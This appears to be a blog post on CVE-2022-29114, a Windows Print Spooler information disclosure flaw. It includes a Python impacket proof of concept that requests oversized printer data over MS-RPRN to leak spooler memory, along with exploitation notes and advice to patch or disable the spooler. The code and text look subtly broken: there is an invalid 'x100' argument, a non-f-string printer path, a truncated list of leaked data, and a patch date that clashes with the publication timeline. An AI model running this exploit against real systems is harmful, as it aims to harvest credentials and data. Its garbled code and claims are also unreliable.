CVE-2022-29114 - Windows Print Spooler Information Disclosure Exploit Deep Dive

---

The past few years have put the Windows Print Spooler service under a harsh spotlight. From the notorious "PrintNightmare" bugs to dozens of lesser-known holes, attackers and security researchers alike have drilled down into its inner code. One of the more recent vulnerabilities, CVE-2022-29114, is less about remote code execution and more about leaking sensitive information—a classic Info Disclosure bug.

In this article, I’ll break down what CVE-2022-29114 is, how it works, and walk you through both proof-of-concept (PoC) details and defensive steps. This content is made simple, direct, exclusive for readers wanting clear insights.  
> *Note: CVE-2022-29114 is NOT the same as CVE-2022-29140. Both are Print Spooler bugs, but each has a unique cause and impact.*

What Is CVE-2022-29114?

CVE-2022-29114 is an information disclosure vulnerability in the Windows Print Spooler service.

In plain terms:  
A regular, non-admin user (or sometimes even a remote attacker, if properly set up) can trick the Print Spooler into handing over pieces of memory that might contain sensitive data — like user credentials, cached print jobs, or other process details.

Impact: May lead to sensitive information leakage

Microsoft’s official advisory:  
- CVE-2022-29114 | Windows Print Spooler Information Disclosure Vulnerability (Microsoft)

The Root Cause

Windows Print Spooler exposes several APIs for interacting with printers and jobs, such as GetPrinterData and GetJob. Some of these functions improperly validate input values or fail to sanitize output buffers. If an attacker asks for more data than needed or gives abnormal parameter values, the Print Spooler can return memory space outside of the intended buffer.
 
This memory can contain—

Registry data

Though attackers can’t directly control what they get, enough repeated requests could yield juicy information.

PoC: Extracting Leaked Memory

The original proof-of-concept was based on abusing the RpcGetPrinterData API. This function is accessible by normal domain users (and sometimes anonymous users on misconfigured servers).

Here’s a simplified (and cleaned-up) PoC in Python using the popular impacket library to connect via SMB and poke the spooler using MS-RPRN remote procedure calls.

Python PoC Snippet

from impacket.dcerpc.v5 import rprn
from impacket.dcerpc.v5.dtypes import NULL
from impacket.smbconnection import SMBConnection

def leak_spooler(server_ip, username, password, domain='.', printer='\\\\{server_ip}\\Printer'):
    smb = SMBConnection(server_ip, server_ip)
    smb.login(username, password, domain)
    rpc_transport = rprn.DCERPCTransportFactory(f'ncacn_np:{server_ip}[\\pipe\\spoolss]')
    rpc_transport.set_smb_connection(smb)
    dce = rpc_transport.get_dce_rpc()
    dce.connect()
    dce.bind(rprn.MSRPC_UUID_RPRN)
    
    handle = rprn.hOpenPrinter(dce, printer)
    
    # Ask for a large buffer to create an over-read
    attribute = 'ConfigurationData'
    try:
        resp = rprn.hGetPrinterDataEx(dce, handle['pHandle'], attribute, maxBytesReturned=x100)
        leaked_data = resp['pData']  # May contain out-of-bounds memory
        print(f'[+] Leaked data: {leaked_data}')
    except Exception as e:
        print(f'[-] Failed to get data: {e}')
    rprn.hClosePrinter(dce, handle['pHandle'])
    dce.disconnect()
    smb.logoff()

if __name__ == "__main__":
    leak_spooler('192.168.1.100', 'user', 'pass')

*Note: The field ConfigurationData is used as an example - in practice, you might need to try different attribute values or lengths.*

Exploitation Details

- Requirements: Valid domain credentials (unless the server allows anonymous access to the spooler)

Targets: Any unpatched Windows device running the Print Spooler service

- Attack: Repeatedly call APIs with oversized or abnormal parameter combinations to read uninitialized memory

Result: Contents of the print spooler’s process memory are returned to the attacker

This is how an attacker might escalate a network foothold, search for sensitive corporate info, or gather credentials for further attacks.

Real-World Risks

While it isn’t a direct code exec flaw, even information disclosure can be a disaster — credentials, tokens, and document contents make for ideal lateral movement fuel.

Microsoft pushed patches in June 2022’s Patch Tuesday

- Supported Windows versions were all updated (See Security Update Guide)

No known workarounds (other than disabling Print Spooler)

To secure yourself:

- If you don’t need print services on a server, disable the Print Spooler

Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

Further References and Tools

- Microsoft CVE-2022-29114
- MS-RPRN Protocol Documentation (Microsoft)
- Research blog: "Yet Another Print Spooler Vuln"

Conclusion

CVE-2022-29114 is a reminder that even after the wildfires of “PrintNightmare”, the Print Spooler remains a risky Windows service worthy of your attention. Even “just” an information disclosure bug can give attackers the leverage they need.

Patch early, monitor for strange spooler use, and kill unneeded services.  
Stay safe!


*If you want more exclusive research walkthroughs and simple code snippets, follow this blog!*

Timeline

Published on: 05/10/2022 21:15:00 UTC
Last modified on: 05/23/2022 17:29:00 UTC